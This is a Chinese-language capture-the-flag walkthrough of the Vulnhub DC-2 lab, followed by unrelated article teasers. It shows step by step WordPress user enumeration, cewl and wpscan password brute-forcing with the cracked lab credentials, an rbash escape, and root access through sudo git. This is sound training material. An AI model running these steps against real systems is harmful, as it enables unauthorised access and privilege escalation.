Vulnhub DC-2

时间：2025-01-20 22:43:01浏览次数：1

标签：__ bin DC Vulnhub tom PATH ___

Vulnhub DC-2

与DC1同样的思路，但是输ip跳转到dc-2，改host文件解决。

发现cms是WordPress。

得到flag1

Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.

More passwords is always better, but sometimes you just can’t win them all.

Log in as one to see the next flag.

If you can’t find it, log in as another.

提示用cewl生成字典爆破密码登录后台。cewl可以针对网站生成对应的字典（从网站中提取文本）

利用wpscan枚举用户名。

wpscan --url http://dc-2 -e u

生成字典

cewl http://dc-2 -w ~/Desktop/pass.txt

开始爆破

wpscan --url http://dc-2 -U ~/Desktop/users.txt -P ~/Desktop/pass.txt

拿到两组账密

Username: jerry, Password: adipiscing
Username: tom, Password: parturient

在Jerry后台找到flag2

If you can't exploit WordPress and take a shortcut, there is another way.

Hope you found another entry point.

提示不从cms考虑。信息搜集时发现存在7744端口ssh服务，用爆破出的账密尝试连接。

ssh tom@192.168.1.8 -p 7744

成功连接。无cat权限查看flag3，但是vi可以

oor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

估计又是要提权了。

发现没有su权限。

tom@DC-2:~$ echo $PATH
/home/tom/usr/bin
tom@DC-2:~$ ls /home/tom/usr/bin
less  ls  scp  vi

只有四个命令权限，考虑rbash逃逸。

BASH_CMDS[x]=/bin/sh #一个内部变量，在受限模式下用于重定向某些命令到指定的路径
x #实际上会启动一个新的不受限的 shell
export PATH=$PATH:/bin/#扩展path环境变量
export PATH=$PATH:/usr/bin/

su jerry进入到Jerry角色

Good to see that you've made it this far - but you're not home yet. 

You still need to get the final flag (the only flag that really counts!!!).  

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

提示git提权

sudo git help config
!/bin/sh

拿到最终flag

 __    __     _ _       _                    _ 
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/ 
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/   


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

标签：__,bin,DC,Vulnhub,tom,PATH,___
From： https://www.cnblogs.com/chang-room/p/18682630

你知道什么是PDCA吗？要怎么运用好它呢？
PDCA是一个循环改进模型，它代表计划（Plan）、执行（Do）、检查（Check）和行动（Act）四个步骤。这个模型最初由美国质量管理专家沃特·阿曼德·休哈特（WalterA.Shewhart）提出，后来由戴明采纳并宣传，因此也被称为戴明环。PDCA是一个用于持续改进、数据驱动、团队合作和适应不同情况的工具，可以广泛应......
AAD08S050G国内已经量产的采样率高达50Gsps的超高速ADC芯片
AAD08S050G芯片是目前国内唯一一款已经量产的采样率高达50Gsps的超高速ADC芯片，处于国际领先水平。可以广泛应用在高端示波器、宽带通信系统以及高速数据采集系统等领域。芯片封装为BGA225。AAD08S050G芯片具有三大技术创新：首先，在采样器前端设计方面，突破了超宽带模拟前端、片上传......
ADCP414、ADCP416四通道125MSPS速率ADC替代AD9653、AD9253，可提供ZZKK证明
ADCP416-125/105/80是一款4通道、16位、125/105/80MSPS模数转换器(ADC)，内置片内采样保持电路，专门针对低成本、低功耗、小尺寸和易用性而设计。该产品的转换速率最高可达125MSPS，具有杰出的动态性能与低功耗特性，适合比较重视小封装尺寸的应用。ADCP416-125特性和优势--电源供电：1.......
Nuxt+tailwindcss+element 零帧起手
文章目录前言一、项目搭建二、全局样式使用（一）、动态样式引入（二）、全局样式引入（三）、tailwindcss引入使用通用引入nuxt3快捷引入三、引入elementplus前言一、项目搭建node版本需要18以上npxnuxi@latestinit<project-name>二、全局样式使用（一）、动态样式引入......
Vulnhub DC-1
VulnhubDC-1第一次接触渗透。全程按照师傅操作。预备导入被攻击机，配置网络为同一模式，保证和kali在同一网段。已知共5个flag。渗透nmap-sP192.168.9.0/24找到被攻击机ip之后进行端口扫描nmap-p-192.168.9.130发现开启22端口和80端口根据wapplyzer插件可知cms为drup......
Vulnhub-Tr0ll靶机笔记
Tr0ll靶机笔记概述靶机地址：https://www.vulnhub.com/entry/tr0ll-1,100/这台靶机比较简单，让我们开始Hackit！一、nmap扫描1、端口扫描sudonmap-sT--min-rate10000-p-192.168.52.6-oportsNmapscanreportfor192.168.52.6Hostisup(0.0026slatency).Notsh......
ReadCat阅读器吾爱置顶的神器，好评如潮速度收藏！(附书源)
你是否还能回想起曾经在课堂上偷偷看小说的时光呢？那种既紧张又兴奋的情绪，就好像刚刚发生过一样。小说于我们而言，不但是舒缓情绪的妙方，更是我们精神世界不可或缺的一部分。瞧，如今我们已不必再在桌下偷偷摸摸看小说了，可打工人忙碌的生活却让我们很难有时间尽......
条件卷积condconv模型详解及代码复现
基本原理条件卷积（CondConv）是一种创新的卷积方法，它通过动态计算卷积核来克服传统静态卷积的局限性。这种方法的核心思想是将卷积核参数化为多个专家（卷积核）的线性组合，具体公式如下：Output(x)=σ((α1⋅W1+...+αn⋅Wn)∗x)在这个公式中：x：表示输入特征图αi：是通过可学......
e2studio开发RA0E1(17)----ADC单通道采集电压
e2studio开发RA0E1.17--ADC单通道采集电压概述视频教学样品申请完整代码下载硬件准备参考程序新建工程工程模板保存工程路径芯片配置工程模板选择时钟设置UART配置UART属性配置设置e2studio堆栈e2studio的重定向printf设置R_UARTA_Open()函数原型回调函数user_uart_callb......
32ADC单通道连续模式只能采样一次问题，adc值不更新（ CUBMX+HAL）
1.问题使用ADC2，单通道（IN15）连续模式cubemx配置如下在main.c中添加如下函数结果adc_value的值只有复位时有效，然后值一直不变（IN15的IO口接了个电压值不断变换的信号）2.解决只要在cubemx中使能LowPowerAutoWait，代码不变，即可正常工作......

Vulnhub DC-2

Vulnhub DC-2

相关文章

赞助商

阅读排行